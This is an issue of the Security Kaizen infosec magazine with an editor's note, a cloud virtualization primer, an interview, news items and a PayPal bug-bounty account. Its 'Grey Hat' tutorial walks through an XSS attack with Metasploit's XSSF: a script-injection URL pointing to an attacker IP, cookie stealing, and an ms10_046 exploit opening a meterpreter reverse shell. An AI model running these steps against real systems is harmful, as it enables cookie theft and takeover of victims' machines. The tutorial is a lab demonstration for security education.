Vol3 Issue 10 .. July/Sept. 2013

www.bluekaizen.org

Internet Security Report from SymantecInterview With Aseem Jakhar & Moataz Salah

Hunting for Vulnerabilities in PaypalUpdates to Facebook Bounty Program

The First Online Recruitment Portal for Information Security Jobs in MiddleEast

06Securitykaizen MagazineContent 2

For Advertisement In Security Kaizen Magazine and www.bluekaizen.org WebsiteMail:info@bluekaizen.org Or Phone: +2 0100 267 5570

Security Kaizen is issued Every 3 months

Reproduction in Whole or part without written permission is strictly

prohibitedALL COPYRIGHTS ARE

PRESERVED TOWWW.BLUEKAIZEN.ORG

Chairman & Editor-in-ChiefMoataz Salah

EditorsBahaa Ahmed

Yahia MamdouhAmgad MagdyJoe SullivanJustin Searle

Ibrahim MosaadAhmed Fawzy

Website DevelopmentMariam Samy

Marketing CoordinatorMahitab AhmedMohamed Saeed

ProofreadingJeff Compton

Designed & Printed2day Adv.

01013126152

contents

New & News

Editor’s Note Interview

Grey Hat

Step by Step New & News

Best PracticeUser To User

No one can deny that the situation in Egypt is very hard; the unstable po-litical situation affects businesses of all kinds.

Today, we will do a unique idea in the interview section. We are having a topic, Security Conferences in Devel-oped Countries, Bluekaizen team.

We have talked before about cloud com-puting? What is it? What are its service models? Deployment types? Who are the cloud providers market leaders?

The all-new Apple iOS 7 launched at WWCD 2013 this week and Jose Rodriguez iPhone user able to hack and bypass Lockscreen to access the Photos in just a few seconds Just after 48 hours of iOS 7 release,

In fact a lot of users didn’t consider or care about XSS and didn’t see it as a big deal that can lead to injecting client-side script into web pages viewed by other users

It is Ibrahim M. El-Sayed, a security re-searcher at vulnerability-lab. Today I am going to explain to you our journey of find-ing vulnerabilities in PayPal.

CAPTCHA is short for "Completely Auto-mated Public Turing test to tell Computers and Humans Apart".

Book Review

This book will be a valuable resource to those involved in penetration testing activi-ties, as well as security professionals and network and system administrators.

contents

Securitykaizen MagazineEditor’s Note3

Editor’sEditor’s Note

www.bluekaizen.org

No one can deny that the situation in Egypt is very hard; the unstable political situation affects businesses of all kinds. But over the last couple of years we have been releasing the magazine in times worse than this. Sometimes, I think if we were working in a more stable business environment, we would be having more success: printing the magazine monthly instead of quarterly; reaching more readers and getting more ads. But I always find in every failure lies opportunity, and in every bad news story a new challenge awaits us. That’s what gives our lives meaning.

www.bluekaizen.org

Securitykaizen MagazineEditor’s Note 4

Today, I feel that Bluekaizen holds a huge responsibility in leading change in the information security field in Egypt and the Middle East. We have been working so hard in the last 3 years to build the community, gather experts, partner with companies and communicate with government. I believe we have had great success thus far and it will be a big waste if this community doesn’t start to affect the industry.

That’s why I want to use this opportunity to announce a new service in Bluekaizen that will enhance in solidifying the community more and might be a small step to creating an ecosystem for the information security field

Security Jobs Portal

In the last couple of years, I have got to know many companies who were searching for good candidates in the information security field. Also, Many times I have been requested to nominate an instructor for a certain course or a certain service, either in Egypt or outside Egypt. Also, I was so near to candidates who want to change their jobs or fresh graduates who want to get hired in a good company. These connections have inspired me to add a new service to the Bluekaizen Profile.

Today, we are working on a recruitment portal where companies can post their jobs to the security community and the security community can post their security skills. The portal’s role is to do the match making between the two and help find the preferred candidates for the specific jobs.

I have been monitoring the activities of all recruitment websites for a while now, and I have noticed that the main issue is filtering. To solve this issue, Job Seekers won’t submit CVs; they will submit their skills. They will submit what they are good at. For example one is a good CEH instructor, another is a good IPS implementer. Someone is experienced in McAfee Encryption products and another is experienced in Symantec backup products.

So, I am asking all our beloved members to start adding their skills and for all companies to start posting their jobs on www.onlysecurityjobs.com

We purchased a new domain to make this project separate from Bluekaizen.org and to make the whole website focus only on the recruitment process. We have a big vision for this portal that won’t succeed without your contributions, either companies or job seekers.

www.bluekaizen.org

Securitykaizen MagazineStep by Step5Step by step

CLOUD

Part 3COMPUTING

The core of cloud computing as we referred to before is the virtualization technology, but what does virtualization really mean? What are the levels and types? And in order to define its risks and its security threats, we need to understand how it works. Virtualization technologies enable the execution of multiple operating system instances, or virtual machines (VMs), on the same physical server. The layer within the virtualization platform that enables hardware resource sharing among VMs is called the hypervisor.

What is hypervisor: software that’s responsible for the hardware resource allocation for VMs. It also keeps the resources for virtual machines separate and secure. Examples include: VMware ESX Server (vSphere), Citrix Xen Server.

What is virtualization levels?• Server Virtualization: divides a physical computer/server into several partly or completely isolated machines commonly known as virtual machines (VM) or guest machines, that minimize cost by increasing the hardware utilization. For example, instead of 20 servers running at 15% of capacity each, you can reduce your hardware count—and associated costs—to 4 servers, each performing at 80%.

We have talked before about cloud computing? What is it? What are its service models? Deployment types? Who are the cloud provider market leaders? Then we look at the security aspects of cloud computing from a different prospective, which covers the major areas of concern about cloud computing technology and the security challenges that you will face when you start your journey to cloud computing. We will start by talking about these aspects in a more technical point of view and dive deeply into each layer of cloud computing and its security to help organizations learn more about it and to increase the awareness of cloud computing security in Egypt.

www.bluekaizen.org

Securitykaizen MagazineStep by Step 6Step by step• Desktop Virtualization: Enables you to deliver secure

virtual desktops as a managed service for remote and branch office employees, which is known as (Desktop as a Service).• Storage Virtualization: Virtualizes storage meaning that you can combine your existing server disks into a single storage unit or a shared pool, without the cost and complexity of purchasing a SAN system. It involves techniques such as data striping or data mirroring.• Network Virtualization: The creation of work space within a larger network or across networks using virtualization techniques.

Types of virtualization:• Full Virtualization: This technique translates kernel code to replace non-virtualizable instructions with new sequences of instructions that have the intended effect on the virtual hardware.

• Para-virtualization:: Virtualization technology by which the software interface presented to the virtual machines is not identical to the underlying hardware. (For example, a virtual network adapter may have capabilities that the physical NIC doesn’t have.)

Hypervisors types: • Type 1 hypervisor (Bare-Metal): A bare metal hypervisor runs directly on the system hardware and does not require the presence of a full host OS, which offers a higher level of virtualization efficiency and security. Examples include: (VMware ESX, Citrix Xen).

• Type 2 hypervisor (Kernel-Based): also called Hosted Hypervisor, is the hypervisor that runs on a host operating system that provides virtualization services to hosted VMs. This type of hypervisor added some security concerns to the virtualization architecture because we have now introduced the vulnerabilities

www.bluekaizen.org

Securitykaizen MagazineStep by Step7Step by stepGrey HatVirtualization security concerns:

• Hypervisor compromise:if the hypervisor layer is compromised – got hacked and changes the configuration, or injects malicious code, etc – it will break the security framework, so the cloud provider should restrict the direct access to the servers hosting the hypervisor, secure the remote connections to the hypervisor, patch the hypervisor and restrict access to the hypervisor APIs.

• Virtual Communications:ensure that the applications running in one VM don’t have access to the applications running in another VM, or access to virtual machines in the same environment or to the underlying host machine.

• VM escape:the program running in a virtual machine is able to completely bypass the virtual layer (hypervisor layer), and get access to the host machine. This problem can be solved by properly configuring the host/guest interaction.

• Host monitor VM traffic:all the network traffic to/from the VMs pass through the host, this enables the host to monitor all the network traffic for all its VMs. In which case if a host is compromised then the security of the VMs are also under question.

• Denial of Service (DoS):it is possible for a guest to impose a denial of service attack to other guests residing in the same system because they all share the same hardware, CPU and network resources. To prevent such attacks we should configure our virtualization solution to limit the resources allocated to each guest machine in the environment.

• Traditional network security:in the virtual world the traditional network security devices/controls will not be effective because most of the communications will be inside the virtual environment, which means we also have to bring them to the virtualization layer. Using the virtual layer network security appliance gives the security administrator the ability to put the VMs in security zones based on their trust level and how critical they are.

• VM files health:in the virtualized world the VM is some files, although numbers or types of these files depend on what virtualization technology and which hypervisor are being used but with the probability to modify these VM files, which can lead to compromise. The provider should apply some hashing techniques to make sure that the VM files are secure.

• Trojaned virtual machines:one of the biggest benefits of virtualization is that it reduces the time and the effort when preparing and building an environment by using OS Templates (pre-packaged OS). But what if the template is trojaned or infected and is not secure? That will infect all the VMs created based on this template. The provider should use verified and tested templates, or even build these templates using its experts.

• Hypervisor-Based Rootkit:runs in Ring-1 and hosts the target operating system as a virtual machine, enabling the rootkit to intercept hardware calls made by the original operating system. Examples of such rootkits are BluePill/ SubVirt/ Virtiol. Microsoft and North Carolina State University demonstrated a hypervisor-layer anti-rootkit called Hooksafe, which provides generic protection against kernel-mode rootkits.

Step by step Securitykaizen MagazineGrey Hat 8

www.bluekaizen.org

Xss Attack Through

Install XSSF MetasploitNow we start to update the Metasploit framework. From the terminal after updating completes, start exporting the

Now let’s start metasploit by typing msfconsole in the terminal and starting msf on port 666 and default port 8888.

XSSF project within the MSF directory and use the svn export within MSF, as svn checkout would break the existing MSF svn file.

When metasploit is loaded, activate XSSF by typing load xssf port=666

Nowadays XSS – Cross site scripting is a rising problem for web applications.In fact a lot of users didn’t consider or care about XSS and didn’t see it as a big deal that can lead to injecting client-side script into web pages viewed by other users. The hacker can also use XSS to bypass access controls such as origin policy session. In this article we are going to demonstrate how to implement a XSS ATTACK using the METASPLOIT Framework that exists in the kali Linux distribution

The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn XSS into much easier work. Basically XSSF works by creating a tunnel, listing all the target machine ID’s. When the user accesses an xss vulnerable webpage, the attacker checks the users browser and searches for a suitable exploit, executes, then compromises the system. Also, xssf integration into the metasploit framework allows users to launch a MSF browser based exploit from the XSS Vulnerability

Grey Hat

Grey HatSecuritykaizen MagazineGrey Hat9

www.bluekaizen.org

After loading type help xssf to display all options. Now type (xssf_urls) to display a generic script to inject within xssf In our other system we have installed Wampserver version 2.0 in Windows 7

After running the generic script, check that the injection was successful by typing the following into Metasploit xssf_victimsThe following figure will appear, showing

Now we inject the browser with generic script http://localhost/?lang="><script src="http://192.168.40.162:8888/loop?interval=2"></script>

To find out more information about the remote machine type Xssf_information 2 Where 2 = server id. Many victims will show multiple server id’s 1, 2, 3...etc

Which was changed to http://localhost/?lang=”> resulting in the following error, confirming persistent Cross site scripting exists.

as it’s vulnerable to cross site scripting. After installation completes, we test it by click on language options which shows the following URL addresshttp://localhost/?lang=en

the victim ip, Browser name and server ID. We will proceed to exploit the 2 browsers, Mozilla and Internet Explorer

Grey HatSecuritykaizen MagazineGrey Hat 10

www.bluekaizen.org

Type in msf > use auxiliary/xssf/public/misc/cookieFollowed by msf> runAfter a while we will interrupt the auxiliary use xssf_logs 1All cookies that have been collected will show up and also be shown through the XSSF interface gui

After getting information from the victim we start to dig deeper by using the cookie stealer module. By default the module is launched on ALL active remote machines (active = true), these values can be set to targeted victim only or interval

Another auxiliary option exists to send an alert to a remote machine Msf > use auxiliary/xssf/public/misc/alertConfigure the message we want to send by typing show options and run

Now we will start to compromise the target machine by using ms10_046. This vulnerability handles Windows shortcut files (.LNK) that point to a malicious DLL to create a WebDav service used for running arbitrary payload when accessed as a UNC path that will be executed without user interaction.

11

www.bluekaizen.org

Type msf > jobs it will show the background job with id 0Type msf > xssf_exploit 0 1 1 = the id of the session in xssf and 0 is the id of the background job of the exploit. It will start the exploit and send the LNK file which continues to the malicious DLL

Start by using exploit ms10_046 and set payload windows/meterpreter/reverse_tcp to connect back to us, then set lhost to the attacker machine ip. The exploit will create a job of the exploitation

With exploitation success you now own the system and can open a meterpreter session

Grey HatSecuritykaizen MagazineGrey Hat

Remedy To protect against XSS Vulnerabilities, we start to implement many things.1. Do not trust the input, especially cookies by the user. The user should validate before allowing access to it, which can be implemented by limiting the domain and path for accepting cookies. 2. Don’t store confidential data in cookies 3. The user can install add-ons to keep watching the input fields and use XSS filters

ConclusionDue to xss attacks, many websites and systems can be compromised and lead to information leakage. We showed how the attacker can use the xss vulnerability and also how to protect the user from cross – site scripting. Websites should start using Vulnerability scanners to detect xss. Remember, it’s very important to follow the input.

www.bluekaizen.org

12Grey HatSecuritykaizen MagazineGrey Hat

Certified (CCNA, CEH)(Founder and instructor) of Master Metasploit (Course)

Yahia Mamdouh

www.bluekaizen.org

User To UserSecuritykaizen MagazineUser to User13

Hunting for Vulnerabilities in PayPal with VLABS

Hunting for Vulnerabilities in PayPal with VLABS

We, vulnerability-lab, got acknowledged by PayPal for finding more than 70 vulnerabilities in PayPal services. We found different types, such as Blind and non-Blind SQL Injections, server and client side cross-site scripting vulnerabilities, Mail Encoding Web Vulnerabilities, Auth Bypass Vulnerabilities, and more. We were actually in the top ten security researchers of the wall of fame.After explaining our contribution toPayPal, in this section, I will explain our methodology of hunting vulnerabilities. We usually work on teams and we divide

the work up by the different services. For example, I work on a service that is hosted on a subdomain called test.paypal.com. We always do our testing manually. We use Firefox as our browser for hacking. We use some add-ons to help us in gathering information about the server and ease the manual testing. Some of the tools are Tamper data, Burp suite, live HTTP headers, cookies manager+, hack-bar and firebug. We usually try to understand the logic behind the services and we mark every place where the service accepts an input from the user directly or indirectly. By

It is Ibrahim M. El-Sayed, a security researcher at vulnerability-lab. Today I am going to explain to you our journey of finding vulnerabilities in PayPal. Our agenda for this article will include: why PayPal acknowledged us in the wall of fame, our methodology for finding vulnerabilities, an example of our vulnerabilities, our reporting technique and I will finish with some tips.

User To User

www.bluekaizen.org

Securitykaizen MagazineUser to User 14

directly, I mean data like company name or address. Indirectly, for example, when you upload an image, the Meta data inside an image might get processed and that could be vulnerable. After logging all possible spots, we try to estimate what vulnerabilities might be there. We estimate that we might find a SQLi persistent there etc... After collecting the data and hypothesizing, we start injecting some malicious code until we discover some vulnerability. Sometimes, we face some difficulties when exploiting the vulnerability. At that stage, we group as a team and think of how we can exploit or bypass such a restriction.

In this section I will explain one of our vulnerabilities at PayPal. This vulnerability has already been patched. Its title on our website is: “Paypal Bug Bounty #48 - Persistent Web Vulnerability”. It is mainly a persistent XSS vulnerability. It is located on a service called GP+. GP+ objectively analyzes and assesses the quality and findablility of online stores. We analyzed the scanning process of the GP+. It was vulnerable in many places, but the one I liked the most was the following. In one stage of the analysis, the PayPal service reads the robot.txt on the target website. It saves its content and when the user checks the analysis results, it displays the robot.txt content. The idea occurred to me, what would happen if we have a robot.txt file that contains malicious code. What would be the behavior of the PayPal service when it saves the content and displays it? Is there any kind of filtering in the input or the output? Luckily, PayPal doesn’t use any kind of security checks for the input coming from the robot.txt file and it displays it as it is. In the following picture you will notice the code getting executed perfectly from the malicious robot.txt file

We usually have a standard reporting technique. We write our report that includes all the details for the vulnerability. For example, it includes the URL, Proof of Concept, proposed solution for the vulnerability, the risk of the vulnerability and more. We also attach screen shots for the vulnerability we found, and finally we attach the vulnerable pages after being exploited. To clarify, if the vulnerable page is search.php, we download the page with the payload inside and we attach it with our report. We send the report to the PayPal security team at sitesecurity@paypal.com, which you can use to report any vulnerability you find. PayPal sets you up with an account on https://keys.ebay.com and you start communicating with them through that account.

Finally, I would like to mention some tips that would help you in hunting for vulnerabilities. The first thing I would like to advise you is to work based on a good methodology that you set it up in your mind. You should understand the logic of the service before you test. This will ease the problem and don’t work like a tool that tests blindly all inputs. You will find many times that the logic itself is vulnerable. I also recommend you work in teams in which you encourage each other and share knowledge. I don’t need to mention that you should NEVER lose hope; you should keep trying and trying until you discover something and always believe in your potential. Last but not least, if you have any questions regarding the article, the vulnerability or anything else and you think I can help, you would be more than welcome to contact me on: storm@vulnerability-lab.com

Security Researcher at Vulnerability Lab

Ibrahim Mosaad

www.bluekaizen.org

15 Securitykaizen MagazineInterview

Today, we will do a unique idea in the interview section. We are having a topic, Security Conferences in Developed Countries, Bluekaizen team, interviewed two founders of two Security Conferences in two different countries. The first is Aseem Jakhar founder of Nullcon conference in India. The second is Moataz Salah, founder of Cairo Security Camp in Egypt. We will try to see the differences and the similarities between the two conferences and the two founders’ visions.

www.CairoSecurityCamp.com www.nullcon.net

Moataz Salahfounder of Cairo Security Camp in Egypt.

Aseem Jakhar founder of Nullcon conference in India.

Interview

www.bluekaizen.org

Securitykaizen MagazineInterview 16

Can you give us more details about your conference (goals, history, how many versions till now, activities..etc )

Aseem: The motto of the conference is - “The next security thing!” which simply means we focus on the future and not on the present. This was the original goal of starting the conference. We wanted a place where everyone could share information on the next-generation of offensive and defensive security. We have successfully conducted four conferences in Goa and one in Delhi (2012). The conference has grown enormously in both content/events and the footfall. We have too many sub events to keep the delegates busy for four days. We have 3 different hacking challenges – HackIM, Battle Underground and Jailbreak. In addition to the talks and trainings, we have free workshops, hacking villages and other fun events. We are also known for our recreational activities. We take the delegates out to the Saturday night bazaar in North Goa and have a couple of more networking parties for the delegates. We also introduced the concept of night talks this year on the night before the first day of the conference. It was an immediate hit with a large crowd, than expected, attending the talks after dinner.

Moataz: I believe all conferences share the same goal, is to transfer knowledge, announce the latest technologies and all that beautiful stuff. But, I would like to add here that Cairo Security Camp, or as we call it CSCAMP, has another long-term goal. Our goal is to build a generation who has the right skills to protect this part of the world. We, in Bluekaizen, believe that it is our role and duty to enhance the level of knowledge and awareness of security professionals.

Moataz: The reason we chose Cairo Security Camp

as a name for our conference is because our vision was to have a full week of information security knowledge for geeks.

Mostly the idea of any camp is that you go in a place far from your home, to have knowledge, fun and change your normal routine. The same in our Security Camp, the idea is to let professionals leave their offices, gather in one place for a whole week once a year (2 days for the conference, and the rest for training) to share knowledge, transfer information and the most important thing is to have fun.

Aseem: We have had a lot of discussion on this while deciding the name. People even suggested names on the lines of h4ckf357 (hackfest). Choosing the name nullcon was not very difficult though. Every team member related to the name instantly in their own way, for some nullcon meant a tribute to null – The open security community, for some the prefix had relevance to security, for some mathematics.What was more difficult was choosing the venue. While almost everyone thinks of organizing the conferences in metro cities, more specifically, the IT hubs, we thought about it and took a different approach to start the conference in Goa. The aim was simple I.e. to relax and also do what you love to do at the same time. The community over time began to appreciate our decision.

Can you, please, tell us why did you choose that name for your conference?

Interview

www.bluekaizen.org

Securitykaizen MagazineInterview17

Cairo Security Camp first version is CSCAMP2010. We will have the fourth version this year in November. CSCAMP is improving exponentially every year. We started in CSCAMP2010 by one room for one day. In CSCAMP2011, we had one conference hall accompanied by Capture the flag competition where hackers gather in CSCAMP to challenge their skills with other teams and we extend it that year to 2 days. In Cscamp2012, We had two conference rooms instead of one in CSCAMP2011, CTF and Exhibition area for companies. In Cscamp2013, we are planning to add more activities.

What is the most unique thing about your conference?Aseem: Every conference says that they are unique :) and they are actually true in one sense as every conference has its own flavour which cannot be replicated elsewhere. We don't consider ourselves as a conference but rather an experience one can only fathom by physically participating instead of reading about it somewhere. As far as content goes, we focus on futuristic technology and attacks of tomorrow and not what is plaguing the systems as of now. We aim to become the platform where researchers and innovative security firms will unleash their next-generation security research. We also add a local touch to nullcon Goa by having a track for local hacks (called Desi Jugaad in Hindi), where we invite researchers who come up with innovative security/tech/non-tech solutions for solving real life challenges or taking up new initiatives.Apart from this, nullcon is the first conference in the world where the Govt. came forward with a Bounty program on a Botnet identification and access. They provided a live malware sample to the participants of the bounty and announced a reward to the first person with information and access. This also caused a little controversy in the Botnet research community. Anyway, in a day one of the participants actually won the bounty.

Moataz: With all that number of security conferences around the world, I believe that our unique point is that CSCAMP is the first and only periodic information security conference that has Arabic as its main language. Most people understand English in my country but having the sessions in Arabic gave us a competitive advantage and enabled us to discover many security professionals and researches.

Interview

www.bluekaizen.org

Securitykaizen MagazineInterview 18

Moataz: In CSCAMP2010, we had an average

of 80 attendees, 5 speakers in one day. In CSCAMP2012, We had an average of 350 attendees, more than 24 speakers in 2

days. Capture the flag competition with more than 30 players and an exhibition area. Also in CSCAMP2012, we had the support of the government represented in the NTRA And also Blackberry, Orange and others. We also run a preconference training for the first time in CSCAMP2012.These are quick numbers to show how CSCAMP events are continuously improving year after year. I remember the first year we started preparation a month before the event. Today we start preparation the next day of last year conference. We open registration 3 months ahead, which something not normal in Egyptian Conferences. The level of my tension before CSCAMP2012 is never compared by CSCAMP2010 and at the same time the level of happiness after the end of CSCAMP2012 is never compared by CSCAMP2010.

Aseem: When we look back now the first conference was very small as compared to the last one. However at the same time it was the most difficult in terms of taking the decision to organize it in the first place. It was really difficult for us on deciding to come out of our comfort zone and organize an event. We all are security researchers and none of us had any prior experience in organizing an event. The first event was a single-track two day conference. It has grown enormously since than and transformed into a four-day event including two days of highly technical training followed by two days of conference, which includes Quad track for talks, workshops and villages and a separate Exhibition area. Also, not to forget the three different hacking challenges, three different recreational events and unlimited live hacking, discussions.

Can you give us a quick comparison between your first version of your conference and your last one?

What is the average price/ ticket?Aseem: There are various packages. The conference price ranges from USD 60 (students) to USD 250 and the training costs range from USD 250 to 700, depending on the duration of the training and the time when you purchase the passes as we have different discounts prior to the conference.

Moataz: The standard ticket costs nearly 100 USD including lunch and coffee breaks for the 2 days, but we do provide cheaper tickets for students and we even sometimes provide free tickets for people who contribute to the community. For example, this year, all Bluekaizen Gold members will enter CSCAMP2013 for free.

Interview

www.bluekaizen.org

Securitykaizen MagazineInterview19

What is the average number of attendees that attend your conference?

What is the main language for your conference? And do you think its better to use the local language or English one?

Aseem: We get roughly around 350-450 delegates at Goa and we expect the number to increase in the coming years as we are just four years old :). We get good participation from various Govt. agencies. The majority of the delegates visit nullcon out of their sheer passion for information security, which is something we really appreciate in our audience.

Moataz: We receive an average of 350-400 attendees in the last two versions attending capture the flag competition, the two parallel conference halls, and the exhibition area.

Aseem: The main language is English. The language is not a concern in India as compared to other parts of the world as almost everyone speaks or understands English. In contrast there are just too many local languages here which makes English the best choice :).

Moataz: I had many debates regarding this question. Although, we have few sessions in English, as we invite famous keynotes every year, our main language is Arabic.This is our competitive advantage other than any other conference in the region. My vision is to go international by going deep local.

Moataz: We have two main problems; the first is the lack

of companies working in security field in Egypt and Middle East in general. This kind of conferences needs sponsors and exhibitors to cover its expenses. The second problem is the lack of aware-

ness of the information security field.

Aseem:The main problems are marketing and sponsorship and this is something that all the conferences face. As we are young it is a little difficult to convince the first time sponsors that participating in the conference will help them in effectively communicating the technical aspects of their offerings to the right audience who actually understands what they need

What are the main problems you face regarding your conference?

Interview

www.bluekaizen.org

Securitykaizen MagazineInterview 20

Do you provide any other kind of activities during the year? Aseem:Payatu Technologies is a boutique security testing company. Apart from organizing the conference we at Payatu Technologies specialize in product security testing, telecom security assessments, mobile and application security assessments and security training.

Moataz: Sure, we do provide specialized Security training. We build our own curriculum. Till now, we have 5 courses in our catalogue. Security Fundamentals, Pen Test for beginners, web application security, Linux security, and windows security. Also our second activity is Security kaizen magazine. This is our quarterly magazine and distributed for free to our readers. The main goal of the magazine is to raise the awareness of our readers and keep them always connected to the latest news of information security.

InterviewMoataz: CSCAMP2013 is our 4th version. We are

targeting to decrease the price more than any other year to let delegates able to attend without waiting for their companies to approve. Also we

will announce our student program in the con-ference. This is a 4 months program for fresh graduates. We will provide them 5 courses from our catalogue . students will be able enroll in this program from jan2014. Also this year we want to expand our exhibition area to get more companies. Call for speakers will end at 15th of august. So hurry up if you need to be one of CSCAMP2013 Speakers.

Aseem:nullcon Goa 2014 (Feb 12-15th) is our 5th Anniversary and you can expect some really cool and new attack vectors, tools being released and some new stuff happening at the conference. We are going to open the CFP in Aug 2013. If you have any interesting and futuristic research, please submit your paper for the same.We are also going to open nominations for Blackshield 2013 awards in information security. We started these awards in 2012 to honor the outstanding security researchers, thought leaders and innovative companies. These are worldwide awards and not location specific. So, if you think you or your colleague has done something really interesting feel free to nominate yourself/your colleague. Details on the awards will be provided soon on the website.

Whats up with the upcoming conference?

New & NewasSecuritykaizen MagazineNew & News21

www.bluekaizen.org

News

The all-new Apple iOS 7 launched at WWCD 2013 this week and Jose Rodriguez iPhone user able to hack and bypass Lockscreen to access the Photos in just a few seconds Just after 48 hours of iOS 7 release, He said that "By opening iOS’s Control Room and accessing the phone’s calculator application before opening the phone’s camera, anyone can access, delete, email, upload or tweet the device’s photos without knowing its passcode."

Zeus propagates through phishing messages that originate from an account that has been phished. Such a phished account will then start automatically sending messages to friends with links to ads telling them to check out a video or product. According to Trend Micro the pages are being hosted by the Russian Business Network. Zeus was first detected in 2007 and it is spreading online. The virus has affected USA and UK, and has moderately affected India, Russia, Canada, and France and etc.

1

2

I phone Ios 7 lock screen has been hacked

Face book virus Zeus targets bank accounts

New & NewasSecuritykaizen MagazineNew & News 22

www.bluekaizen.org

Tens of thousands of Gmail accounts belonging to Iranian users have been targeted in an politically motivated hacking campaign in the weeks leading up to the country's closely watched presidential elections. These campaigns, which originate from within Iran, represent a significant jump in the overall volume of phishing activity in the region," Eric Grosse, Google's Vice President for Security Engineering. Also Google said that "if you are in Iran, we encourage you to take extra steps to protect your account," added Grosse. To prevent phishing attacks, we encouraged users in Iran to use a modern browser and enable two-step authentication. Also verify the Login URL in the address bar of their browser before entering Gmail password”

Iranian hackers were able to gain access to control-system software that could allow them to manipulate oil or gas pipelines. Malware have been found in the power grid that could be used to deliver malicious software to damage plants. The targets have included several American oil, gas and electricity companies, which government officials have refused to identify. Tom Cross, director of security research at Lancope, told that industrial control systems such as those used to control oil and gas pipelines are more interconnected with public networks like the Internet than most people realize. "It is also difficult to fix security flaws with these systems because they aren't designed to be patched and restarted frequently. In the era of state-sponsored computer attack activity, it is not surprising to hear reports of these systems being targeted,"

Iranian Gmail users attacked

Iranian Hackers can attack US oil, gas, and electric companies

Hackers called Anonymous and SEA hacked Turkish Ministry of Interior website and the private information of staffers in PM Tayyip Erdogan's office. Hackers claimed that they gained access to staff email addresses, passwords and phone numbers. As exposed on internet, database include emails and plain text passwords of 9 users and the team also defaced the dosya.icisleri.gov.tr and placed their logo on site. "Rise against the injustice of Erdogan's Tyranny. Rise against the policies of hypocrisy perpetrated by the Erdogan Regime." The defacement message reads. 3

Erdogan’s staff emails hacked by Syrian Electronic Army Hackers as #OpTurkey

4

5

New & NewasSecuritykaizen MagazineNew & News23

www.bluekaizen.org

The companies behind the programs will often pay out a bounty to the person who discovered the issue. The programs are intended to create an incentive for researchers to privately report issues and allow vendors to release fixes before hackers take advantage of flaws.

Prof. Keinan. Israeli researcher said that "All biological systems, and even entire living organisms, are natural molecular computers. Every one of us is a bio-molecular computer, that is, a machine in which all components are molecules "talking" to one another in a logical manner. The hardware and

software are complex biological molecules that activate one another to carry out some predetermined chemical tasks. The input is a molecule that undergoes specific, programmed changes, following a specific set of rules (software) and the output of this chemical computation process is another well defined molecule."

PayPal will pay Bug Bounty reward to teenager

Israel develop biological computer

6

8

massive effort by the U.S. National Security Agency to track cell phone calls and monitor the e-mail and Internet traffic of virtually all Americans. he said, "I understand that I will be made to suffer for my actions," but "I will be satisfied if the federation of secret law, unequal pardon and irresistible executive powers that rule the world that I love are revealed even for an instant." He added, "Any analyst at any time can target anyone. Any selector. Anywhere. I, sitting at my desk, had the authority to wiretap anyone, from you or your accountant to a federal judge to even the president if I had a personal email."

The individual responsible for one of the most significant leaks in US political history is Edward Snowden who worked his way into the most secretive computers in U.S. intelligence as a defense contractor and identifies himself as the source of leaks about US surveillance programmes PRISM. He is responsible for handing over material from one of the world's most secretive organizations the NSA Snowden publicly revealed himself as the source of documents outlining a

Whistleblower behind the NSA surveillance Program leak (Prism)

7

New & NewasSecuritykaizen MagazineNew & News 24

www.bluekaizen.org

User To User

www.bluekaizen.org

“This year’s ISTR shows that cybercriminals aren’t slowing down, and they continue to devise new ways to steal information from organizations of all sizes,” said Justin Doo, Security Practice Director, Middle East, Symantec. “The sophistication of attacks coupled with today’s IT complexities, such as virtualization, mobility and cloud, require organizations in Egypt to remain proactive and use ‘defense in depth’ security measures to stay ahead of attacks.”

ISTR 18 Egypt Highlights:• Decrease in global ranking in spam and phishing.• Ranked first in the Middle East region for malicious code and in the top ten globally.• Ranked second in the Middle East for overall security threat profile, behind Saudi Arabia.

ISTR 18 Key Highlights Include:Small Businesses Are the Path of Least Resistance Targeted attacks are growing the most among businesses with fewer than 250 employees. Small businesses are now the target of 31 percent of all attacks, a threefold increase from 2011. While small businesses may feel

they are immune to targeted attacks, cybercriminals are enticed by these organizations’ bank account information, customer data and intellectual property. Attackers hone in on small businesses that may often lack adequate security practices and infrastructure. Web-based attacks increased by 30 percent in 2012, many of which originated from the compromised websites of small businesses. These websites were then used in massive cyber-attacks as well as “watering hole” attacks. In a watering hole attack, the attacker compromises a website, such as a blog or small business website, which is known to be frequently visited by the victim of interest. When the victim later visits the compromised website, a targeted attack payload is silently installed on their computer. The Elderwood Gang pioneered this class of attack; and, in 2012, successfully infected 500 organizations in a single day. In these scenarios, the attacker leverages the weak security of one business to circumvent the potentially stronger security of another business. Manufacturing Sector and Knowledge Workers Become Primary Targets

Symantec Internet Security Threat Report Reveals Increase in Cyberespionage – Including Threefold Increase in Small Business AttacksCairo, Egypt – Symantec Corp.’s (Nasdaq: SYMC) Internet Security Threat Report, Volume 18 (ISTR) today revealed a 42 percent surge during 2012 in targeted attacks compared to the prior year. Designed to steal intellectual property, these targeted cyberespionage attacks are increasingly hitting the manufacturing sector as well as small businesses, which are the target of 31 percent of these attacks globally. Small businesses are attractive targets themselves and a way in to ultimately reach larger companies via “watering hole” techniques. In addition, consumers remain vulnerable to ransomware and mobile threats, particularly on the Android platform.

New & NewasSecuritykaizen MagazineNew & News25

User To UserNew & NewasShifting from governments, manufacturing has moved to the top of the list of industries targeted for attacks in 2012. Symantec believes this is attributed to an increase in attacks targeting the supply chain – cybercriminals find these contractors and subcontractors susceptible to attacks and they are often in possession of valuable intellectual property. Often by going after manufacturing companies in the supply chain, attackers gain access to sensitive information of a larger company. In addition, executives are no longer the leading targets of choice. In 2012, the most commonly targeted victims of these types of attacks across all industries were knowledge workers (27 percent) with access to intellectual property as well as those in sales (24 percent).

